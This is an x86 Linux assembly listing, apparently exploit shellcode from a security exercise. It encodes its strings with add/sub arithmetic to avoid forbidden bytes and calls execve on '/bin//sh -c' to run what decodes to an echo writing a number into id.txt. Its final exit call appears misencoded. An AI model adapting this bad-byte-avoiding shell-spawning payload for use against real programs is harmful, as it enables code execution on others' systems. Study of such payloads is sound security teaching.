add    esp,0xfffffdfc
mov    eax,0x11111111
sub    eax,0x11111111
push   eax

jmp    shellcode

bin:
    push   0x68732f2f
    push   0x6e69622f
    mov    ebx,esp
    push   eax
    mov    edx,esp
    push   eax
    jmp    c

c:
    mov    eax,0x2222854f
    sub    eax,0x22222222
    push   eax
    mov    esi,esp
    mov    eax,0x11111111
    sub    eax,0x11111111
    push   eax
    jmp    file

file:
    mov    eax,0x8589853f
    sub    eax,0x11111111
    push   eax
    mov    eax,0x757a314f
    sub    eax,0x11111111
    push   eax
    jmp    id

id:
    mov    eax,0x31314249
    sub    eax,0x11111111
    push   eax
    mov    eax,0x41494848
    sub    eax,0x11111111
    push   eax
    mov    eax,0x49424431
    sub    eax,0x11111111
    push   eax
    mov    eax,0x11111111
    sub    eax,0x11111111
    mov    eax,0x5e575254
    add    eax,0x11111111
    push   eax
    mov    eax,0x11111111
    sub    eax,0x11111111
    mov    edi,esp
    push   eax
    push   edi
    push   esi
    push   ebx
    mov    ecx,esp
    mov    al,0xb
    int    0x80
    jmp    exit


shellcode:
    jmp bin

exit:
    mov    eax,0x11111111
    sub    eax,0x11111111
    push   eax
    mov    eax,0x22222222
    sub    eax,0x12222222
    xor    ebx, ebx
    int    0x80